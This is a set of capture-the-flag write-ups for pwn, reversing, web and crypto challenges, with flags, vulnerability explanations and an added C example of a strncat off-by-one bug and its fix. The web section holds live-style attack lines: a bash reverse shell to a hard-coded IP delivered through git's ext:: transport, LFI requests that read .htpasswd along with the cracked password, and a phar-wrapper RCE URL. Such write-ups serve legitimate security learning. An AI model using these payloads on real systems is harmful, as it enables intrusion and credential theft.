Lays, freetsubasa, date
CTF{rilakkuma}
rilakkuma.jpg
Start
[BGM] https://www.youtube.com/watch?v=bBzBZJwW90g
nc ctf.pwnable.tw 8731
The program reads 60 bytes onto the stack, causing a buffer overflow
First overwrite the return address to jump to 0x8048087
Leak the stack address, then overflow a second time to jump to the shellcode:
Flag: CTF{Z3r0_1s_st4rt}
Create your silver bullet !
[BGM] https://www.youtube.com/watch?v=QCTz2ie6uUg
nc ctf.pwnable.tw 4869
The strncat call in power_up() can cause an overflow:
strncat(bullet->desc,buf,MAX - bullet->power);
First create a bullet whose description is 47 bytes long, then power_up() with 1 byte: strncat writes a NULL into the lowest byte of power, turning power into 1
Doing power_up() once more then changes the value of power and overflows into the return address of main()
Finally, set power to a huge value and kill the Werewolf to trigger the return
Because the overflow goes through strncat, the ROP chain cannot contain a NULL byte
My exploit here is fairly complicated: first leak puts@got, then call read_int() to put an address into eax, then jump into the middle of read_int() to execute read(0, eax, 0x41414141) and read in the second ROP chain, then do a stack migration and execute system("/bin/sh")
A simpler approach would probably be to return to main after the leak and do a second overflow
Flag: CTF{Using_the_silv3r_bull3t_to_pwn_th3_w0rld}
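The off-by-one in the strncat call above, shown next to a corrected version. This is an added example, not the challenge's source: MAX = 48, power stored directly after desc, the flat-array model and every function name are assumptions, and a little-endian machine is assumed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX 48  /* assumed size of desc; the page only shows the name MAX */

/* Flat model of { char desc[MAX]; uint32_t power; } so the stray write stays
 * inside one array and is well-defined to run (the layout is an assumption). */
typedef struct { char raw[MAX + sizeof(uint32_t)]; } bullet_t;

static uint32_t get_power(const bullet_t *b) {
    uint32_t p; memcpy(&p, b->raw + MAX, sizeof p); return p;
}
static void set_power(bullet_t *b, uint32_t p) { memcpy(b->raw + MAX, &p, sizeof p); }

void create_bullet(bullet_t *b, const char *desc) {
    memset(b, 0, sizeof *b);
    strncpy(b->raw, desc, MAX - 1);            /* desc[MAX-1] stays '\0' */
    set_power(b, (uint32_t)strlen(b->raw));
}

/* The pattern from the page: n = MAX - power leaves no room for the '\0' that
 * strncat always appends, so it lands on power's low byte (little-endian). */
uint32_t power_up_vulnerable(bullet_t *b, const char *buf) {
    strncat(b->raw, buf, MAX - get_power(b));
    set_power(b, get_power(b) + (uint32_t)strlen(buf));
    return get_power(b);
}

/* Hardened: measure the real string, reserve one byte for the terminator,
 * and recompute power from the result instead of trusting the old field. */
uint32_t power_up_fixed(bullet_t *b, const char *buf) {
    const char *nul = memchr(b->raw, '\0', MAX);
    if (nul == NULL) return get_power(b);      /* desc not terminated: refuse */
    size_t room = (size_t)(MAX - 1) - (size_t)(nul - b->raw);
    if (room > 0) strncat(b->raw, buf, room);
    set_power(b, (uint32_t)strlen(b->raw));
    return get_power(b);
}

int main(void) {
    char desc[MAX]; memset(desc, 'A', 47); desc[47] = '\0';  /* constructed input */
    bullet_t b;
    create_bullet(&b, desc);
    printf("vulnerable: power 47 -> %u\n", (unsigned)power_up_vulnerable(&b, "B"));
    create_bullet(&b, desc);
    printf("fixed:      power 47 -> %u\n", (unsigned)power_up_fixed(&b, "B"));
    return 0;
}
```

With the vulnerable form the bookkeeping field drops from 47 to 1 although the description is full; the corrected form leaves it at 47 and never writes past desc.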
Have you finished your howework ?
[BGM] https://www.youtube.com/watch?v=T0LfHEwEXXw
nc ctf.pwnable.tw 55688
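Same vulnerability as in the homework: entering a negative number when adding a note makes an address in the GOT point to the note content
But in this challenge each note can hold at most 8 bytes, and they must be alphanumeric
The solution is to execute a few instructions at a time and then jo 0x38 to jump to the next note content and continue executing
First build read(0, esp, xxxx), then read in the second-stage shellcode: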
Flag: CTF{Sh3llcoding_in_th3_n0t3_ch4in}
Ref: https://www.youtube.com/watch?v=9bHibgrjNlc&list=PLTdZQWyXtB8PyKWfJyBM9TmdksIEcNRXl&index=2
Find the secret of my heart !
[BGM] https://www.youtube.com/watch?v=i4TqyI9EfzE
nc ctf.pwnable.tw 31337
heart_ctor() contains a null-byte overflow:
It can be used to overwrite the size of the next freed chunk
The exploitation goes as follows
Add three secrets A, B, C:
[A size=0x40][B size=0x110][C size=0x100]
free B and A
[freed size=0x40][freed size=0x110][C size=0x100]
add A back, and through the overflow shrink the size of the free chunk so that a gap appears between the chunks
[A size=0x40][freed size=0x100][][C size=0x100]
----------------------------^^-----------------
add B'
[A size=0x40][B' size=0x90][freed size=0x70][][C size=0x100]
add D
[A size=0x40][B' size=0x90][D size=0x40][freed size=0x30][][C size=0x100]
add E to separate C from the top chunk, then free C
At this point C uses prev_size to find the previous chunk and merges with it.
Because of the gap created earlier, the prev_size of C was never updated, so it still believes the previous chunk is B
B and C are therefore merged together
The result is that the free chunk overlaps D:
[A size=0x40][freed size=0x210][E size=0x110]
---------------[D size=0x40]-----------------
Next, taking the freed chunk in the middle through malloc() gives control over the contents of D
However, a secret chunk holds only strings; there is no pointer that could be modified and abused
Fastbin corruption can be used instead:
B, using the overlap to change the size of D to 0x60, while also modifying the size of the chunk after D so that it is aligned and has prev_inused set to 1
[A size=0x40][B size=0x100][freed size=0x110][E size=0x110]
--------------[D size=0x60][D' size=0x90 prev_inused=1]----
B, D, putting D into the fastbin:
[A size=0x40][freed size=0x210][E size=0x110]
--------------[freed size=0x60]--------------
B, to modify the fd of D in the fastbin so that it points to the name of list[3]:
[A size=0x40][B size=0x100][freed size=0x110][E size=0x110]
---------------[freed size=0x60 fd->note_list[3].name]-----
B, forging in the name of list[3] a fake fastbin chunk with size 0x60 and fd pointing to 0x601ffa, a location slightly above the GOT. The dword at this address + 8 is 0x60, so it passes the size check malloc() performs when taking a chunk out of the fastbin
add_secret, adding two chunks of size 0x60; malloc() returns the fd we forged in the previous step, which points to secret[3].name
Within it, write free@got onto secret[3].secret
Showing secret[3] then leaks the libc address
One more malloc() returns the chunk located at 0x601ffa, which makes it possible to overwrite the GOT and change free() to system()
Flag: CTF{It_just_4_s3cr3t_on_the_h34p}
Ref: http://4ngelboy.blogspot.tw/2016/03/advanced-heap-exploitation.html
Pwning for kidding !!
[BGM] https://www.youtube.com/watch?v=pn5tnyuHW3g
nc ctf.pwnable.tw 8361
The challenge author says they want to keep the trick in reserve, so the solution is not published
This challenge will meet everyone on the soon-to-launch wargame site: pwnable.tw !
Flag: CTF{It_is_just_4_kiddin9}
It's very crazy ! Don't do it !!
[BGM] https://www.youtube.com/watch?v=qjJFWZAirjI
nc ctf.pwnable.tw 56746
Try to decrypt the flag.
Notice: The flag doesn't include 'CTF{}' after decryption, but you must add the prefix when submitting to scoreboard.
An executable generated by AutoHotkey
Extract the src from the resources:
It looks like it corresponds to flag.enc
Write a script to decrypt the flag:
Flag: CTF{l0c4l_stud3nts_n33d_b4sic_p0ints}
orange = web
orangr = ?
http://140.113.209.24:10301/orangr/index.php
There is only a login page; orangr.so can be found at http://140.113.209.24:10301/
Reversing it shows that it is a php extension used to check the login:
zif_check_user() simply checks username = pwn_gg
zif_check_pw() converts the password into a big number, runs a series of operations through libgmp and compares the result:
Re-implement the program logic and hand it to KLEE to solve for mod_result, then treat it as base 56 to compute the password:
username = pwn_gg
password = 22484314038774183882379870536595842641055898869375067333079702401161192138756198707377056157299919
Log in to get the Flag
Flag: CTF{ORangr_ANDangr_XORangr_NOTangr}
Pure reverse ?
Notice: The flag doesn't include 'CTF{}' in this challenge but you must add the prefix when submitting to scoreboard.
tsubasa
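The program is a binary produced by movfuscator
Running it displays
One trick for analysing a movfuscator binary is to start tracing from the external calls; observation shows that the program keeps calling malloc()
The guess is that it is generating the chunks the challenge mentions, so write a .so to hook malloc() and dump the contents:
Each chunk turns out to have a different size, but all of them are 16-character strings, with 1023 chunks in total:
Sort them as the challenge description says and take specific characters to form the Flag: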
Flag: CTF{1ns7rum3n74710n_1s_sh4m3ful_8u7_us3ful}
I wanna play a game …
nc 140.113.209.24 10003
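After connecting, it turns out to be a game that does who knows what:
Analysing the binary shows that it is Minesweeper
There are 9 levels in total; every - cell must be filled in with a number, or -1 for a mine, and the board sent back
Each level's board size is height=i * 10, width=i * 10, number of mines=i * 100 * i / 5
I simply found a minesweeper solver online and hooked it up: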
Flag: CTF{ZZZ_zzz_zZZ_Zzz_ZzZ_zZz_ZZz_zzZ}
Here is no service let you pwn, but you can pwn yourself.
hint: https://github.com/HexHive/printbf
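Loading it into IDA shows a pile of crap
Later, from the hint, it turns out to be a binary generated by printbf
So I started consulting the printbf source code and tried to convert the binary back into brainfuck code:
First break at 0x402C75 in gdb and dump the program contents at 0x641868
brainfuck code:
(the final 65535 < are omitted here)
Running it through an interpreter outputs gg
A little analysis shows that the program writes some values into memory
Breaking before the input is read, two sets of data of the same length can be found in memory
The guess is that the input is combined with one of the sets and the result compared against the other:
After xor, the Flag comes out…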
Flag: CTF{fm7_vuln_1s_7ur1ng_c0mpl373}
Do you have dream ?
[BGM] https://www.youtube.com/watch?v=5fxPY4hi-P4
http://ctf.pwnable.tw:1412
It is a cgi, so of course the first step is to find a way to get the binary; scanning the directories reveals http://ctf.pwnable.tw:1412/.svn
Pull down the site contents with a tool: https://github.com/kost/dvcs-ripper
grep CTF -r
gives the Flag for the Web part: CTF{Dont_forget_subversion_in_your_dream}
Next, analyse dream.cgi:
It quickly becomes clear that take_off contains a simple bof that can overwrite the return address of main
The exploit first uses ROP to call get_dream() so that eax points to our QUERY_STRING, then jumps to the shellcode at eax+100 to get a reverse shell:
After getting the shell, there is a seteuid binary /home/dream/get_flag, along with its source code:
Entering %6$d leaks the password through the format string bug
and the flag can then be read
Flag: CTF{Y0ur_dr34m_is_so_b34ut1ul}
Decode base64 encoded ELF binary from the server.
And finish puzzles three times to capture the flag.
nc 133.130.124.59 9991
[Don't waste your time on this] https://www.youtube.com/watch?v=uuMNmHdr0Lg
Hint:
aHR0cHM6Ly91cmwuZml0L1hmVE9U
just_pepe_puzzle.jpg
First of all, the hint is completely useless…
Testing shows that the ELF returned by the server is different every time
When run, the binary reads input 9 times in total; each input is 2 digits from 0 ~ 6 and must satisfy a condition. The checks of 3 binaries must be passed in total
Just run angr on it…
Flag: CTF{5YW25a+m5pq05Yqb6Kej5aW95YOP5Lmf6Kej55qE5Ye65L6G}
Try to decode base64 encoded elf from server.
Let's oo together.
nc 133.130.124.59 9992
As before, the binary returned is different every time; the program internally generates a bunch of numbers and asks you what they are
Just scrape them out with objdump and send them back:
Flag: CTF{o_oo_ooo_th1s_1s_how_simple_acg_look_like}
Try to decode base64 encoded elf from server.
And make a delicious sushi.
nc 133.130.124.59 9993
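As before, the binary returned is different every time. The program generates a series of strings, then picks two bytes and asks for their sum; after 20 correct answers you can write 100 bytes into the program and trigger a gets() bof
Being lazy, dump the strings directly with angr
Finally write the shellcode and overwrite the return address; note that the buffer size of the bof is different every time: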
Flag: CTF{1ife_1s_1ike_such1_as_known_as_sh1t}
http://54.199.166.146/f31c286df3608f5b71ea528d7220974957bfb14d/
header("Location: ban.php");
The script does not exit after this call
curl http://54.199.166.146/f31c286df3608f5b71ea528d7220974957bfb14d/panel.php
Flag: CTF{Admin's_pane1_1s_0n_F1r3!?!?!}
http://54.199.166.146/258c634761ca928154687da257f68c5347ad68c3/
http://54.199.166.146/258c634761ca928154687da257f68c5347ad68c3/?source=
This gives the source code:
http://54.199.166.146/258c634761ca928154687da257f68c5347ad68c3/?assert=highlight%5Ffile("%66lag.%70hp")
Bypass the blacklist
Flag: CTF{bypass_php_filter_is_so_fuN!}
http://54.199.166.146/699e46f901f0533e28b21b4a13e27e2f7b9092a2/
Local File Inclusion:
curl http://54.199.166.146/699e46f901f0533e28b21b4a13e27e2f7b9092a2/image.php?p=../admin/.htaccess
curl "http://54.199.166.146/699e46f901f0533e28b21b4a13e27e2f7b9092a2/image.php?p=../admin/.htpasswd_which_you_should_not_know"
secret_admin:K7WeKYm8O5MQI
Crack the plaintext password with john: !@#$%^&* (secret_admin)
Log in at http://54.199.166.146/699e46f901f0533e28b21b4a13e27e2f7b9092a2/admin to get the Flag
Flag: CTF{apache_config_file_is_sensitive}
http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/
Local File Inclusion
curl http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/?p=php://filter/convert.base64-encode/resource=index
This reveals upload_snoopy.php, an image upload page
http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/?p=upload_snoopy
Take a look at the source code:
curl http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/?p=php://filter/convert.base64-encode/resource=upload_snoopy
The upload only checks that the file name ends in .jpg, so a phar can be uploaded and included through the phar wrapper to achieve RCE
Pack shell.php into a zip, rename it to shell.jpg and upload it
http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/?p=phar://./images/MOVB3TIuh.jpg/shell&c=cat%20/flag
Flag: CTF{finally_got_RCE_but_do_you_have_enough_sleep?}
Do you really know GIT :P
Please HACK http://133.130.122.214/
CVE-2015-7545
cmd.txt:
bash -i > /dev/tcp/106.186.20.187/1234 0<&1 2>&1
http://133.130.122.214/?cmd=clone&url=ext::wget l4ys.tw/cmd.txt
http://133.130.122.214/?cmd=clone&url=ext::bash cmd.txt.1
Ref: https://git-scm.com/docs/git-remote-ext
Flag: CTF{Bug_bounty_really_learnable!!!Come and join us!!!}
nc csie.ctf.tw 10180
AES-OFB
We are given the FLAG encrypted with a Secret IV and a Secret Key, plus several other results encrypted the same way. We know the Plaintext is string.letters + string.digits. Because of how AES-OFB chains, Ciphertext = Plaintext ^ AES(KEY, IV), which means we can guess the result of AES(KEY, IV) and use the several results encrypted the same way to verify the guess. And because the strings encrypted each time come from the same source, repeated tests narrow the result down to one of the candidates.
Flag: CTF{$!mi14r_7o_th3_h3@0m3w@rk5?}
The same plaintext is encrypted under different keys, so it can be recovered with Hastad's Broadcast Attack
Take the n and c for e=7 from the output and compute the Flag with CRT:
Flag: CTF{C1ll4s$!c_c0o0omm0n_m0du1u$55_a7t@ck!!!#>_<}
With Wireshark the server's SSL certificate can be dumped; the certificate contains the public key it uses for encryption
Submitting this number to factordb.com gives p and q; a tool then produces the pem, and loading the pem back into Wireshark reveals the flag
Flag: CTF{F4c70rdb_m4j_h3!p_y@u_4_lo00o@ot!!*-}
From the contents of the packets we can obtain
Because AES-CBC is split into blocks, start from the known block, that is, Plaintext[16:] and Ciphertext[16:].
First find all key combinations, and use Ciphertext[0:16] to verify whether each combination is possible.
Then, for every possible key, try to recover the IV from Ciphertext[0:16], and decrypt the FLAG with that (key, IV) pair; the result in FLAG format is the solution.
Ref: https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/TMCTF/crypto/crypto200
Flag: CTF{0x52fec4c0afd8ffaebc93cbaa6}